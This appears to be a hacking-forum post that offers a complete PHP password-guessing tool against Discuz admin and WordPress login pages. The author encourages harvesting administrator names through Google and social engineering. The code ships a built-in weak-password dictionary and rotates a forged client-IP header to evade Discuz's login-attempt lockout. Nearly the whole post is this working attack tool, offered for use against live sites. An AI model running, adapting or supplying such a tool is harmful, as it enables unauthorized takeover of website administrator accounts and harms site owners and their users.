Dad no longer has to worry about traditional information security attack methods failing to break through.

When you feel you have exhausted the traditional information security techniques, have you considered that brute force is still an option? Most large sites nowadays run a Discuz (dz) forum or a WordPress (wp) blog, and what do you do without a 0DAY in hand? Remember the saying: "don't fear a godlike opponent, fear a pig-like teammate." Combine that with non-traditional social engineering to gather information, build a dictionary, and finally run the fuzz. In my spare time I wrote a PHP version of this fuzzer, with only the dz and wp modules; anyone interested can add other modules. If you have good lists of commonly used weak passwords, please share them in this thread. I also have not written the script that automatically scrapes the Discuz and WordPress administrator lists; just Google it, then put the names in user.txt and run the fuzz against them. I will add that feature next time.
Below is a screenshot of the tool in action:
[screenshot: fuzz]

<?php
if ($argc < 3) {
    print_r('
============================================================
author : Chora
example: ' . $argv[0] . ' Host dz (utf8)
example: ' . $argv[0] . ' Host dz gbk
example: ' . $argv[0] . ' Host wp gbk
example: ' . $argv[0] . ' Host Type Gbk/Utf8
============================================================
');
    die();
}
define("DZ", "/admin.php");    // Discuz login URL
define("WP", "/wp-login.php"); // WordPress login URL
$host = $argv[1];
$type = strtoupper($argv[2]);
$code = isset($argv[3]) ? strtoupper($argv[3]) : 'UTF8'; // encoding is optional, defaults to UTF-8
function send($url, $post, $cookie, $header, $ip)
{
    global $host;
    $html = '';
    $data = ($post ? "POST " : "GET ") . $url . " HTTP/1.1\r\n";
    $data .= "Host: $host\r\n";
    $data .= "User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:24.0) Gecko/20100101 Firefox/24.0\r\n";
    $data .= "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\n";
    $data .= "Accept-Language: zh-cn,zh;q=0.8,en-us;q=0.5,en;q=0.3\r\n";
    $data .= "Accept-Encoding: gzip, deflate\r\n";
    $data .= $cookie ? $cookie . "\r\n" : "";
    $data .= $ip ? "Client_Ip: $ip\r\n" : "";
    $data .= $post ? "Content-Type: application/x-www-form-urlencoded\r\n" : "";
    $data .= $post ? "Content-Length: " . strlen($post) . "\r\n" : "";
    $data .= "Connection: close\r\n\r\n";
    $data .= $post ? "$post\r\n\r\n" : "";
    $fp = fsockopen(gethostbyname($host), 80, $errno, $errstr);
    if ($fp) {
        fputs($fp, $data);
        while (!feof($fp)) {
            $html .= fread($fp, 8192);
        }
        fclose($fp);
        return $html;
    } else {
        die("Could not Connect to $host $errno:$errstr");
    }
}
function match($result)
{
    // A successful login answers with a redirect; change the keyword to suit the target
    return preg_match('/302 Found/i', $result);
}
function ip() // bypass Discuz's login-attempt limit
{
    $ip = array();
    for ($i = 0; $i < 4; $i++) {
        $ip[] = rand(0, 255);
    }
    return implode('.', $ip);
}
function encode($arr, $code)
{
    $encode = array();
    foreach ($arr as $value) {
        if ($code == 'GBK') {
            $value = gbk($value);
        }
        $value    = trim($value);
        $encode[] = rawurlencode($value);
    }
    return $encode;
}
function gbk($string) // convert to GBK; default is UTF-8. Mainly for Discuz administrators with Chinese names
{
    return iconv("UTF-8", "GBK", $string);
}
function cut($dic) // split the built-in list into one entry per line, dropping empty lines
{
    $dic = preg_split('/\r\n|\n|\r/', $dic);
    return array_values(array_filter(array_map('trim', $dic), 'strlen'));
}
// built-in usernames
$user = "
admin
管理员
";
// built-in passwords
$pass = "
admin
123456
admin888
1234567
12345678
123456789
987654321
87654321
7654321
654321
555555
111111
666666
888888
88888888
000000
00000000
5201314
5211314
asdfgh
";
// external user-defined usernames and passwords: user.txt (usernames), pass.txt (passwords)
if (!file_exists('user.txt')) {
    if (file_exists('pass.txt')) {
        $user = cut($user);
        $pass = file('pass.txt');
    } else {
        $user = cut($user);
        $pass = cut($pass);
    }
} elseif (file_exists('user.txt')) {
    if (file_exists('pass.txt')) {
        $user = file('user.txt');
        $pass = file('pass.txt');
    } else {
        $user = file('user.txt');
        $pass = cut($pass);
    }
}
$user = encode($user, $code);
$pass = encode($pass, $code);
function crackdz()
{
    global $user, $pass;
    $found = 0;
    foreach ($user as $username) {
        foreach ($pass as $password) {
            $post   = "admin_username=$username&admin_password=$password";
            $result = send(DZ, $post, '', '', ip());
            if (match($result)) {
                echo "Found[*] Username: " . rawurldecode($username) . " Password: " . rawurldecode($password) . "\r\n";
                $found = 1;
            }
        }
    }
    if (!$found) {
        echo 'Not Found!';
    }
    exit();
}
function crackwp()
{
    global $user, $pass;
    $found = 0;
    foreach ($user as $username) {
        foreach ($pass as $password) {
            $post   = "log=$username&pwd=$password";
            $result = send(WP, $post, '', '', '');
            if (match($result)) {
                echo "Found[*] Username: " . rawurldecode($username) . " Password: " . rawurldecode($password) . "\r\n";
                $found = 1;
            }
        }
    }
    if (!$found) {
        echo 'Not Found!';
    }
    exit();
}
if ($type == 'DZ') {
    crackdz();
} elseif ($type == 'WP') {
    crackwp();
}
?>